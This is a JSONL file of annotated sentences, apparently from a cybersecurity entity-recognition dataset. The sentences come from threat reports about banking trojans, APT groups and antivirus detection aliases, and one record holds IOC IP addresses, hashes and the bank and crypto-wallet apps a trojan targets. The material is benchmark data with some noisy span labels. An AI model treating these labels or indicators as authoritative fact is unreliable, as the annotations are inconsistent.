{"text": "Attackers deliver the Trojan using generic Portuguese language phishing emails and are currently targeting seven Brazilian banks.", "spans": {"Malware: Trojan": [[22, 28]], "Organization: Brazilian banks.": [[113, 129]]}, "info": {"id": "cyner2_valid_000697", "source": "cyner2_valid"}}
{"text": "PC malware first introduced this technique which is becoming a trend in mobile malware having been adopted by several malware families including Dendroid .", "spans": {"Malware: Dendroid": [[145, 153]]}, "info": {"id": "cyner2_valid_000698", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.Hupigon.bkgjiq Backdoor.Graybird Trojan.Win32.Mepaow.moy Backdoor.Doumol!DIRtAUaekSk WIN.WORM.Virus Trojan/Mepaow.dg Win32.Troj.Mepaow.kcloud Backdoor:Win32/Doumol.A Trojan/Win32.Mepaow Backdoor.Graybird!rem VirTool.Win32.DelfInject Delf.PTD Trj/Keylog.LH", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000701", "source": "cyner2_valid"}}
{"text": "APT29 has used The Onion Router TOR and the TOR domain fronting plugin meek to create a hidden, encrypted network tunnel that appeared to connect to Google services over TLS.", "spans": {"System: The Onion Router TOR": [[15, 35]], "System: the TOR domain": [[40, 54]], "Malware: plugin meek": [[64, 75]], "System: encrypted network tunnel": [[96, 120]], "System: Google services over TLS.": [[149, 174]]}, "info": {"id": "cyner2_valid_000702", "source": "cyner2_valid"}}
{"text": "This means that in the future, the threat actor can change or add other processes or targets.", "spans": {}, "info": {"id": "cyner2_valid_000703", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.ScriptKD.6954 Risktool.Bitcoinminer Trojan.ScriptKD.6954 Trojan.ScriptKD.6954 Trojan.ScriptKD.D1B2A Coinmin.CB2FB968 W32/Rasftuby.A Coinmin.CB2FB968 Trojan.Win64.Miner.eurebl Trojan.ScriptKD.6954 Trojan.BtcMine.1713 BehavesLike.Win32.HTool.hc PUA.CoinMiner W32/Trojan.WNJU-7839 RiskTool.BitCoinMiner.fog PUA/BitCoinMiner.N RiskWare[RiskTool]/Win32.BitCoinMiner Trojan:Win64/CoinMiner.PA RiskWare.BitCoinMiner Trj/CI.A Trojan.Miner!QERlh7+J44U Win32/Trojan.Script.6ae", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000704", "source": "cyner2_valid"}}
{"text": "Also known as Snake or Uroburos, names which come from its top class rootkit, the Turla cyber-espionage group has been active for more than 8 years.", "spans": {"Malware: rootkit,": [[69, 77]]}, "info": {"id": "cyner2_valid_000706", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Downloader/W32.Lastad.49152.C Trojan/Downloader.Lastad.d Trojan.Win32.Lastad.djar W32/Downloader.NZ TROJ_NDWARE.A Trojan.Downloader.Small-175 Trojan-Downloader.Win32.Lastad.d Troj.Downloader.W32.Lastad.d!c TrojWare.Win32.TrojanDownloader.Lastad.d Trojan.DownLoader.1037 Downloader.Lastad.Win32.21 TROJ_NDWARE.A BehavesLike.Win32.Downloader.pm W32/Downloader.WEKO-9166 TrojanDownloader.Lastad.g TR/Dldr.Small.RN.1 Trojan[Downloader]/Win32.Lastad Win-Trojan/Lastad.49152.C TrojanDownloader:Win32/Lastad.D Win32/Lastad.B Trojan.Win32.Lastad.d Trojan-Downloader.Win32.Lastad Downloader.Lastad.B", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000707", "source": "cyner2_valid"}}
{"text": "RuMMS Samples , C2 , Hosting Sites , Infections and Timeline In total we captured 297 RuMMS samples , all of which attempt to contact an initial C2 server that we extracted from the app package .", "spans": {"Malware: RuMMS": [[0, 5], [86, 91]]}, "info": {"id": "cyner2_valid_000708", "source": "cyner2_valid"}}
{"text": "Since the year before last March 2021, malware of the Lazarus attack group has been found in a number of companies, including domestic defense, satellite, software, and media companies, so ASEC AhnLab Security Emergency Response Center is Malicious code is continuously tracked and analyzed", "spans": {"Malware: malware": [[39, 46]], "Organization: companies,": [[105, 115]], "Organization: domestic defense, satellite, software,": [[126, 164]], "Organization: media companies,": [[169, 185]], "Organization: ASEC AhnLab Security Emergency Response Center": [[189, 235]]}, "info": {"id": "cyner2_valid_000709", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.MyShellHA.Worm Backdoor.Winterlove.D Backdoor.Winterlove.D Backdoor/WinterLove.d Backdoor.Winterlove.D W32/WinterLove.XWGQ-2895 Backdoor.Trojan TROJ_SPNR.35CC13 Win.Trojan.Winterlove-66 Backdoor.Win32.WinterLove.d Trojan.Win32.WinterLove.ejoo Backdoor.Win32.A.WinterLove.78364[h] Backdoor.Winterlove.D Backdoor.Winterlove.D BackDoor.Plunix Backdoor.WinterLove.Win32.62 TROJ_SPNR.35CC13 BehavesLike.Win32.AdwareRugo.lm W32/WinterLove.U@bd Backdoor/Winterlove.11 W32/Heuri.E!tr.bdr Trojan[Backdoor]/Win32.WinterLove Backdoor.Winterlove.D Backdoor.W32.WinterLove.d!c Win-Trojan/Winterlove.78364 Backdoor:Win32/Winterlove.D Backdoor.Winterlove.D Backdoor.WinterLove Win32.Backdoor.Winterlove.Eddq Backdoor.Win32.WinterLove Backdoor.Winterlove.D Backdoor.Win32.WinterLove.d", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000710", "source": "cyner2_valid"}}
{"text": "Following this theft, the actors covered their tracks by launching a destructive KillDisk variant which wiped over 9,000 computers and 500 Windows servers.", "spans": {"Malware: KillDisk variant": [[81, 97]], "System: 9,000 computers": [[115, 130]], "System: 500 Windows servers.": [[135, 155]]}, "info": {"id": "cyner2_valid_000711", "source": "cyner2_valid"}}
{"text": "A backdoor targetting Linux also known as: Application.CoinMiner.AA Misc.Riskware.BitCoinMiner.Linux ELF_COINMINER.I Application.CoinMiner.AA not-a-virus:HEUR:RiskTool.AndroidOS.Miner.b Application.CoinMiner.AA Riskware.Unix.BitCoinMiner.ewuygp Linux.S.BitCoinMiner.820652 Application.CoinMiner.AA Application.CoinMiner.AA Tool.Linux.BtcMine.400 ELF_COINMINER.I RiskTool.Linux.od APPL/BitCoinMiner.rbpfo RiskWare[RiskTool]/Linux.BitCoinMiner.n Application.CoinMiner.AA Linux/Miner.820652 not-a-virus:HEUR:RiskTool.AndroidOS.Miner.b Trojan.RubyMiner Win32/Virus.RiskTool.42d", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000712", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: MultiDropper.cfh Trojan/BHO.cecj Trojan.BHO.Win32.24353 Trojan/BHO.qkl Trojan.Graftor.D9C41 Trojan.Win32.A.BHO.111104.D Trojan/Win32.BHO.R33802 Trojan.BHO W32/BHO.NCU!tr Win32/Trojan.93b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000713", "source": "cyner2_valid"}}
{"text": "We also connect one of the code signing certificates we observed to a campaign targeting gaming companies.", "spans": {}, "info": {"id": "cyner2_valid_000714", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.JorikVobfus.Trojan Trojan.Win32.Jorik.Vobfus!O Trojan.Jorik.Win32.113249 Trojan/Jorik.Vobfus.eznm Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Dwn.vzier Trojan.Win32.Z.Jorik.32768.AR Trojan.DownLoader25.46460 BehavesLike.Win32.Backdoor.nc Trojan.Win32.Jorik Trojan/Jorik.efzx Trojan/Win32.Vobfus TrojanDownloader:Win32/Bledox.B Trojan/Win32.Jorik.R33060 Trj/CI.A Win32.Trojan.Spnr.Ahom Trojan.Vobfus!8P/NLcybpCM Win32/Trojan.18e", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000715", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.Kelios.cdpjyc Trojan.DownLoader6.14598 BehavesLike.Win32.HLLPPhilis.vc TR/Kelios.2459909.1 Trojan.Kelios.1 Trojan:Win32/Loodir.A Backdoor.Win32.Morix PSW.OnlineGames4.LLY Win32/Trojan.4af", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000716", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Flooder.Win32.UDP!O Trojan.Black.Win32.12225 Win32.Trojan.WisdomEyes.16070401.9500.9702 W32/Teriyaki.A@bd Win.Trojan.Flooder-31 Flooder.Win32.UDP.21 Trojan.Win32.Flystud.dhag Trojan.Hookey Flooder.Win32 W32/Teriyaki.ALGH-8371 Flooder.UDP.j TR/QQFlood.wmfdp Flooder.Win32.UDP.21 Trojan/Win32.Flooder.R12225 Flooder.UDP Win32/Flooder.QQFlood.B", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000717", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Dropped:Backdoor.OnionDuke.A Trojan.Spy.Zbot Win32.Trojan.WisdomEyes.16070401.9500.9982 Win32/Tnega.MNdBdFB Dropped:Backdoor.OnionDuke.A Dropped:Backdoor.OnionDuke.A Riskware.Win32.Crypted.cstwha Trojan.Win32.Z.Onionduke.356049 Dropped:Backdoor.OnionDuke.A Trojan:W32/Sipuli.A BackDoor.OnionDuke.1 Trojan.Magania.Win32.64778 Trojan.Crypt3 AdWare/MSIL.po Pua.Premiuminstaller Backdoor.OnionDuke.A TrojanDropper:Win32/OnionDuke.A Dropped:Backdoor.OnionDuke.A Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000718", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Tompai.B Backdoor.Tompai.B Backdoor.Tompai.b.n3 Trojan.Win32.Tompai.ehjy W32/Tompai.B Backdoor.Trojan Tompai.AP VBS/Redlof.G WORM_TOMPAI.A Trojan.Tompai-1 Backdoor.Win32.Tompai.b Backdoor.Tompai.B Backdoor.Tompai!MrQm7vNkZGw Backdoor.Win32.Tompai.65024 Virus.Win32.Heur.p Backdoor.Win32.Tompai.NAA Backdoor.Tompai.B BackDoor.Nightcraw BDS/Tompai.B WORM_TOMPAI.A Backdoor/Tompai.l Win32.Hack.Tompai.b.kcloud Backdoor:Win32/Tompai.E Backdoor.Tompai.B W32/Tompai.IXGF-2153 Trojan/Win32.HDC Backdoor.Tompai Backdoor.Trojan Win32/Tompai.NAA Backdoor.Win32.Tompai W32/Tompai.B!tr W32/Legwidan.A.worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000719", "source": "cyner2_valid"}}
{"text": "Check Point researchers have found a new variant of the HummingBad malware hidden in more than 20 apps on Google Play.", "spans": {"Organization: Check Point researchers": [[0, 23]], "Malware: HummingBad malware": [[56, 74]], "System: Google Play.": [[106, 118]]}, "info": {"id": "cyner2_valid_000720", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Application.Dialer.AXQ Trojan.Katusha.Win32.22016 DIAL_RAS.IO Win32.Trojan.WisdomEyes.16070401.9500.9691 DIAL_RAS.IO Win.Trojan.Dialer-736 not-a-virus:Porn-Dialer.Win32.Payer.a Application.Dialer.AXQ Riskware.Win32.Payer.udjsg Win32.Trojan.Dialer.Wsad Application.Dialer.AXQ Porn-Dialer.Payer.c GrayWare[Porn-Dialer]/Win32.Payer Trojan:Win32/RasDialer.O Application.Dialer.AXQ not-a-virus:Porn-Dialer.Win32.Payer.a Application.Dialer.AXQ Trojan/Win32.Dialer.R116531 Application.Dialer.AXQ Trojan.Win32.RasDialer.O", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000721", "source": "cyner2_valid"}}
{"text": "The malware authors are leveraging Google Cloud Servers to host the initial Spy Banker Downloader Trojan, which is responsible for downloading and installing Spy Banker Trojan Telax.", "spans": {"System: Google Cloud Servers": [[35, 55]], "Malware: Spy Banker Downloader Trojan,": [[76, 105]], "Malware: Spy Banker Trojan Telax.": [[158, 182]]}, "info": {"id": "cyner2_valid_000722", "source": "cyner2_valid"}}
{"text": "One of final payloads that is created by this dropper is an Uroburos variant used by the Turla group, which traditionally operates out of Russia.", "spans": {"Malware: final payloads": [[7, 21]], "Malware: dropper": [[46, 53]], "Malware: Uroburos variant": [[60, 76]]}, "info": {"id": "cyner2_valid_000723", "source": "cyner2_valid"}}
{"text": "The analysis that follows is of completed, historical attacks as well as an extremely recent and ongoing attack, providing insight into the volume and timeline of infections, as well as a timeline for attacker-initiated actions using a novel malware family.", "spans": {}, "info": {"id": "cyner2_valid_000725", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Dropped:Trojan.Dropper.SGO Worm/W32.Gibon.78848.C Backdoor.Syrutrk.A2 Win32.Trojan.WisdomEyes.16070401.9500.9991 W32/DldrX.CVLN BKDR_GIBON.SMA Dropped:Trojan.Dropper.SGO Trojan.Win32.Dropper.igzp Dropped:Trojan.Dropper.SGO Trojan.MulDrop.origin Backdoor.Win32.Syrutrk W32/Downloader.HIXV-3829 TR/Gibon.66560 Trojan[Downloader]/Win32.Murlo Backdoor:Win32/Syrutrk.A Trojan.Dropper.SGO Worm/Win32.Gibon.R3401 Dropped:Trojan.Dropper.SGO TrojanDownloader.Murlo Dropped:Trojan.Dropper.SGO Dropped:Trojan.Dropper.SGO W32/Bckdr.QUZ!tr Win32/Trojan.bc4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000726", "source": "cyner2_valid"}}
{"text": "Over the past year, Talos has devoted a significant amount of time to better understanding how ransomware operates, its relation to other malware, and its economic impact.", "spans": {"Organization: Talos": [[20, 25]], "Malware: ransomware": [[95, 105]], "Malware: malware,": [[138, 146]]}, "info": {"id": "cyner2_valid_000728", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.Zusy!O Trojan.Mediyes.B Rootkit.Win32.Mediyes.aag Trojan.NtRootKit.13221 Rootkit.Mediyes.ag Trojan/Win32.Unknown Trojan.Zusy.DD88 Rootkit.Win32.Mediyes.aag Backdoor/Win32.Mediyes.R23431 Rootkit.Mediyes Rootkit.Mediyes!tfGzm2Igz6k Rootkit.Win32.Mediyes", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000730", "source": "cyner2_valid"}}
{"text": "BEBLOH is also known for hiding in memory and creating a temporary new executable file upon shutdown, and deleting said file after re-infecting the system.", "spans": {"Malware: BEBLOH": [[0, 6]], "System: system.": [[148, 155]]}, "info": {"id": "cyner2_valid_000731", "source": "cyner2_valid"}}
{"text": "What is Chrysaor ? Chrysaor is spyware believed to be created by NSO Group Technologies , specializing in the creation and sale of software and infrastructure for targeted attacks .", "spans": {"Malware: Chrysaor": [[8, 16], [19, 27]], "Organization: NSO Group Technologies": [[65, 87]]}, "info": {"id": "cyner2_valid_000732", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.VB.exowsu W32/Trojan.BLDI-5947 TrojanDownloader:VBS/Semicxer.A WM/Moat.B7D1D3FC!tr Win32/Trojan.940", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000733", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Mydoom.M@mm Worm/W32.Mydoom.87552 W32/Mydoom.O@MM MyDoom.L@mm Email-Worm.Win32.Mydoom.m Win32.Mydoom.M@mm I-Worm.Mydoom!W5qtz8CaGIM I-Worm.Win32.Mydoom.87552 Virus.Win32.Heur.c Win32.Mydoom.M@mm Win32.HLLM.MyDoom.54464 Heuristic.BehavesLike.Win32.ModifiedUPX.J Email-Worm.Win32.Mydoom!IK Worm/Mydoom.gz Worm.Mydoom.m.kcloud Win32.Mydoom.M@mm Win32/Mydoom.worm.87552 BScope.Malware-Cryptor.Win32.HZ4.12 Email-Worm.Mydoom Trojan.Win32.Dself.c Email-Worm.Win32.Mydoom W32/MyDoom.M@mm I-Worm/Mydoom.O W32/Mydoom.N.worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000734", "source": "cyner2_valid"}}
{"text": "When executed, these WSFs downloaded the Cerber crypto-ransomware.", "spans": {"Malware: the Cerber crypto-ransomware.": [[37, 66]]}, "info": {"id": "cyner2_valid_000735", "source": "cyner2_valid"}}
{"text": "The file b0a365d0648612dfc33d88183ff7b0f0 was named GSB[.]doc which is short for Government Service Bus or in Arabic قناة التكامل الحكومية", "spans": {}, "info": {"id": "cyner2_valid_000736", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Buzy.D6BD Trojan.Win32.Z.Cyspetel.425984 TrojWare.Win32.Cyspetel.C Backdoor:Win32/Cyspetel.A W32/Cyspetel.A!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000737", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.Clod971.Trojan.9196 Trojan.Downloader Trojan/Downloader.Small.pel Trojan.Win32.Chiviper.dcbav Adware.StartPage TROJ_SMALL.SMDA Trojan.DownLoader4.31050 TROJ_SMALL.SMDA Trojan[Downloader]/Win32.Small Win32.Hack.Huigezi.ec.kcloud Trojan:Win32/Chiviper.C Virus.Win32.Part.a Trojan.Win32.Swisyn Trojan.Win32.Small.PEL", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000738", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Nebuler.dll Trojan.Nebuler.2 TROJ_NEBULER.SMK Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_NEBULER.SMK Trojan.Win32.Z.Nebuler.72704 Trojan.Mssmsgs.3845 Nebuler.dll Trojan.Win32.Nebuler Backdoor/WinUOJ.cqg Trojan:Win32/Paramis.A Trojan/Win32.Nebuler.R11854 SScope.Trojan.EIC.21905 Win32/Trojan.9ea", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000739", "source": "cyner2_valid"}}
{"text": "The 24 target apps belong to 7 different Spanish banks : Caixa bank , Bankinter , Bankia , BBVA , EVO Banco , Kutxabank and Santander .", "spans": {"System: Caixa bank": [[57, 67]], "System: Bankinter": [[70, 79]], "System: Bankia": [[82, 88]], "System: BBVA": [[91, 95]], "System: EVO Banco": [[98, 107]], "System: Kutxabank": [[110, 119]], "System: Santander": [[124, 133]]}, "info": {"id": "cyner2_valid_000740", "source": "cyner2_valid"}}
{"text": "Performing Man-in-the-Browser attacks", "spans": {}, "info": {"id": "cyner2_valid_000741", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.WNetRAT W32/Trojan.HHFH-1089 Trojan.Zusy.D38301 Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000743", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Nuker.NuKe.3.0 Trojan.Nuker.NuKe.3.0 Trojan.Nuker.NuKe.3.0 W32/Tool.WTQM-4805 HKTL_TSKNUKE.A Win.Trojan.N-85 Trojan.Nuker.NuKe.3.0 Exploit.Win32.Nuker.NuKe.30 Trojan.Nuker.NuKe.3.0 Exploit.Win32.Nuker-NuKe.htlk Trojan.Nuker.NuKe.3.0 Trojan.Nuker.NuKe.3.0 FDOS.Pili Tool.NuKe.Win32.1 HKTL_TSKNUKE.A Nuker.Win32.IceNuker W32/VirTool.KS Flooder.NuKe.30.b Trojan[Exploit]/Win32.Nuker Exploit.Win32.Nuker.NuKe.30 Exploit.Nuker.NuKe Win32/Nuker.NuKe.30 Win32.Exploit.Nuker.Pbyv", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000744", "source": "cyner2_valid"}}
{"text": "As a case in point, we recently discovered a SPAM campaign targeting German-speaking users that involves a relatively new commercialized RAT called Ozone.", "spans": {"Organization: German-speaking users": [[69, 90]], "Malware: RAT": [[137, 140]], "Malware: Ozone.": [[148, 154]]}, "info": {"id": "cyner2_valid_000745", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.Driveinfo.Worm Win32.Worm.AutoRun.LM Worm.Win32.Small!O Worm.Small Win32.Worm.AutoRun.LM W32/Small.i Win32.Worm.AutoRun.LM Win32.Trojan.WisdomEyes.16070401.9500.9640 W32/SillyWorm.VV W32.Resik.A Win32/Resik.A WORM_SMALL.BIX Win.Worm.Small-5683 Win32.Worm.AutoRun.LM Worm.Win32.Small.i Win32.Worm.AutoRun.LM Trojan.Win32.Small.yrjx Worm.Win32.Small.24576.C Win32.Worm.AutoRun.LM Win32.Worm.AutoRun.LM Win32.HLLW.Autoruner Worm.Small.Win32.41 WORM_SMALL.BIX W32/CWT.worm Worm.Win32.Small.i W32/Worm.SRZV-4847 Worm/Small.k WORM/Small.I.2 Worm/Win32.Small Worm.Win32.Small.i Worm/Win32.AutoRun.R25754 W32/CWT.worm Worm.Small Trj/VB.OO I-Worm.Small.NAL Win32/Small.NAL", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000746", "source": "cyner2_valid"}}
{"text": "Both the Trochilus and MoonWind RATs were hosted on the same compromised sites and used to target the same organization at the same time.", "spans": {"Malware: Trochilus": [[9, 18]], "Malware: MoonWind RATs": [[23, 36]], "Vulnerability: compromised sites": [[61, 78]], "Organization: same organization": [[102, 119]]}, "info": {"id": "cyner2_valid_000747", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Downloader.JTZC Troj.Downloader.Script!c Trojan.Downloader.JTZC Trojan.Downloader.JTZC Trojan.Downloader.JTZC BehavesLike.Win32.BadFile.dh Trojan.Downloader.JTZC Script/Virus.435", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000749", "source": "cyner2_valid"}}
{"text": "Learn more about our mobile threat defense capabilities in Microsoft Defender for Endpoint on Android .", "spans": {"System: Microsoft Defender": [[59, 77]], "System: Android": [[94, 101]]}, "info": {"id": "cyner2_valid_000750", "source": "cyner2_valid"}}
{"text": "Kaspersky Lab has observed new waves of attacks that started on the 8th and the 27th of June 2016.", "spans": {"Organization: Kaspersky Lab": [[0, 13]]}, "info": {"id": "cyner2_valid_000751", "source": "cyner2_valid"}}
{"text": "Their main infection vector is phishing e-mails, which", "spans": {"Malware: infection vector": [[11, 27]]}, "info": {"id": "cyner2_valid_000752", "source": "cyner2_valid"}}
{"text": "All of these domains were registered by the same entity and they were resolving to the same IP.", "spans": {}, "info": {"id": "cyner2_valid_000753", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Downloader/W32.Centim.15872.AC Trojan/Downloader.Centim.ch Win32.Trojan.WisdomEyes.16070401.9500.9994 W32/Downloader.SZXX-8375 Downloader.Trojan Win.Downloader.Small-963 Trojan.Win32.Centim.ddia TrojWare.Win32.TrojanDownloader.Centim.~A Trojan.DownLoader.5835 Trojan-Downloader.Win32.Centim W32/DldrX.ORO TrojanDownloader.INService.tp W32.Trojan.Downloader-Daily-Wea Trojan[Downloader]/Win32.INService Trojan.Zusy.D331E Trojan/Win32.Xema.C27234 Win32.Trojan-downloader.Inservice.Tayl W32/Dowcen.DQ!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000754", "source": "cyner2_valid"}}
{"text": "] ml/mms3/download_3.php IP addresses 78.46.201.36 88.99.170.84 88.99.227.26 94.130.106.117 88.99.174.200 88.99.189.31 Hash 369fcf48c1eb982088c22f86672add10cae967af82613bee6fb8a3669603dc48 b2d4fcf03c7a8bf135fbd3073bea450e2e6661ad8ef2ab2058a3c04f81fc3f3e 8f5d5d8419a4832d175a6028c9e7d445f1e99fdc12170db257df79831c69ae4e a5ebcdaf5fd10ec9de85d62e48cc97a4e08c699a7ebdeab0351b86ab1370557d 84578b9b2c3cc1c7bbfcf4038a6c76ae91dfc82eef5e4c6815627eaf6b4ae6f6 89eecd91dff4bf42bebbf3aa85aa512ddf661d3e9de4c91196c98f4fc325a018 9edee3f3d539e3ade61ac2956a6900d93ba3b535b6a76b3a9ee81e2251e25c61 0e48e5dbc3a60910c1460b382d28e087a580f38f57d3f82d4564309346069bd1 c113cdd2a5e164dcba157fc4e6026495a1cfbcb0b1a8bf3e38e7eddbb316e01f 1819d2546d9c9580193827c0d2f5aad7e7f2856f7d5e6d40fd739b6cecdb1e9e b213c1de737b72f8dd7185186a246277951b651c64812692da0b9fdf1be5bf15 453e7827e943cdda9121948f3f4a68d6289d09777538f92389ca56f6e6de03f0 0246dd4acd9f64ff1508131c57a7b29e995e102c74477d5624e1271700ecb0e2 88034e0eddfdb6297670d28ed810aef87679e9492e9b3e782cc14d9d1a55db84 e08f08f4fa75609731c6dd597dc55c8f95dbdd5725a6a90a9f80134832a07f2e 01c5b637f283697350ca361f241416303ab6123da4c6726a6555ac36cb654b5c 1fb06666befd581019af509951320c7e8535e5b38ad058069f4979e9a21c7e1c 6bdfb79f813448b7f1b4f4dbe6a45d1938f3039c93ecf80318cedd1090f7e341 ADDITIONAL INFORMATION Packages monitored pin.secret.access com.chase.sig.android com.morganstanley.clientmobile.prod com.wf.wellsfargomobile com.citi.citimobile com.konylabs.capitalone com.infonow.bofa com.htsu.hsbcpersonalbanking com.usaa.mobile.android.usaa com.schwab.mobile com.americanexpress.android.acctsvcs.us com.pnc.ecommerce.mobile com.regions.mobbanking com.clairmail.fth com.grppl.android.shell.BOS com.tdbank com.huntington.m com.citizensbank.androidapp com.usbank.mobilebanking com.ally.MobileBanking com.key.android com.unionbank.ecommerce.mobile.android com.mfoundry.mb.android.mb_BMOH071025661 com.bbt.cmol com.sovereign.santander com.mtb.mbanking.sc.retail.prod com.fi9293.godough com.commbank.netbank org.westpac.bank org.stgeorge.bank au.com.nab.mobile au.com.bankwest.mobile au.com.ingdirect.android org.banksa.bank com.anz.android com.anz.android.gomoney com.citibank.mobile.au org.bom.bank com.latuabancaperandroid com.comarch.mobile com.jpm.sig.android com.konylabs.cbplpat by.belinvestbank no.apps.dnbnor com.arkea.phonegap com.alseda.bpssberbank com.belveb.belvebmobile com.finanteq.finance.ca pl.eurobank pl.eurobank2 pl.noblebank.mobile com.getingroup.mobilebanking hr.asseco.android.mtoken.getin pl.getinleasing.mobile com.icp.ikasa.getinon eu.eleader.mobilebanking.pekao softax.pekao.powerpay softax.pekao.mpos dk.jyskebank.mobilbank com.starfinanz.smob.android.bwmobilbanking eu.newfrontier.iBanking.mobile.SOG.Retail com.accessbank.accessbankapp com.sbi.SBIFreedomPlus com.zenithBank.eazymoney net.cts.android.centralbank com.f1soft.nmbmobilebanking.activities.main com.lb.smartpay com.mbmobile com.db.mobilebanking com.botw.mobilebanking com.fg.wallet com.sbi.SBISecure com.icsfs.safwa com.interswitchng.www com.dhanlaxmi.dhansmart.mtc com.icomvision.bsc.tbc hr.asseco.android.jimba.cecro com.vanso.gtbankapp com.fss.pnbpsp com.mfino.sterling cy.com.netinfo.netteller.boc ge.mobility.basisbank com.snapwork.IDBI com.lcode.apgvb com.fact.jib mn.egolomt.bank com.pnbrewardz com.firstbank.firstmobile wit.android.bcpBankingApp.millenniumPL com.grppl.android.shell.halifax com.revolut.revolut de.commerzbanking.mobil uk.co.santander.santanderUK se.nordea.mobilebank com.snapwork.hdfc com.csam.icici.bank.imobile com.msf.kbank.mobile com.bmm.mobilebankingapp net.bnpparibas.mescomptes fr.banquepopulaire.cyberplus com.caisseepargne.android.mobilebanking com.palatine.android.mobilebanking.prod com.ocito.cdn.activity.creditdunord com.fullsix.android.labanquepostale.accountaccess mobi.societegenerale.mobile.lappli com.db.businessline.cardapp com.skh.android.mbanking com.ifs.banking.fiid1491 de.dkb.portalapp pl.pkobp.ipkobiznes pl.com.suntech.mobileconnect eu.eleader.mobilebanking.pekao.firm pl.mbank pl.upaid.nfcwallet.mbank eu.eleader.mobilebanking.bre pl.asseco.mpromak.android.app.bre pl.asseco.mpromak.android.app.bre.hd pl.mbank.mnews eu.eleader.mobilebanking.raiffeisen pl.raiffeisen.nfc hr.asseco.android.jimba.rmb com.advantage.RaiffeisenBank pl.bzwbk.ibiznes24 pl.bzwbk.bzwbk24 pl.bzwbk.mobile.tab.bzwbk24 com.comarch.mobile.investment com.android.vending com.snapchat.android jp.naver.line.android com.viber.voip com.gettaxi.android com.whatsapp com.tencent.mm com.skype.raider com.ubercab com.paypal.android.p2pmobile com.circle.android com.coinbase.android com.walmart.android com.bestbuy.android com.ebay.gumtree.au com.ebay.mobile com.westernunion.android.mtapp com.moneybookers.skrillpayments com.gyft.android com.amazon.mShop.android.shopping com.comarch.mobile.banking.bgzbnpparibas.biznes pl.bnpbgzparibas.firmapp com.finanteq.finance.bgz pl.upaid.bgzbnpp de.postbank.finanzassistent pl.bph de.comdirect.android com.starfinanz.smob.android.sfinanzstatus de.sdvrz.ihb.mobile.app pl.ing.mojeing com.ing.mobile pl.ing.ingksiegowosc com.comarch.security.mobilebanking com.comarch.mobile.investment.ing com.ingcb.mobile.cbportal de.buhl.finanzblick pl.pkobp.iko pl.ipko.mobile pl.inteligo.mobile de.number26.android pl.millennium.corpApp eu.transfer24.app pl.aliorbank.aib pl.corelogic.mtoken alior.bankingapp.android com.ferratumbank.mobilebank com.swmind.vcc.android.bzwbk_mobile.app de.schildbach.wallet piuk.blockchain.android com.bitcoin.mwallet com.btcontract.wallet com.bitpay.wallet com.bitpay.copay btc.org.freewallet.app org.electrum.electrum com.xapo com.airbitz com.kibou.bitcoin com.qcan.mobile.bitcoin.wallet me.cryptopay.android com.bitcoin.wallet lt.spectrofinance.spectrocoin.android.wallet com.kryptokit.jaxx com.wirex bcn.org.freewallet.app com.hashengineering.bitcoincash.wallet bcc.org.freewallet.app com.coinspace.app btg.org.freewallet.app net.bither co.edgesecure.app com.arcbit.arcbit distributedlab.wallet de.schildbach.wallet_test com.aegiswallet com.plutus.wallet 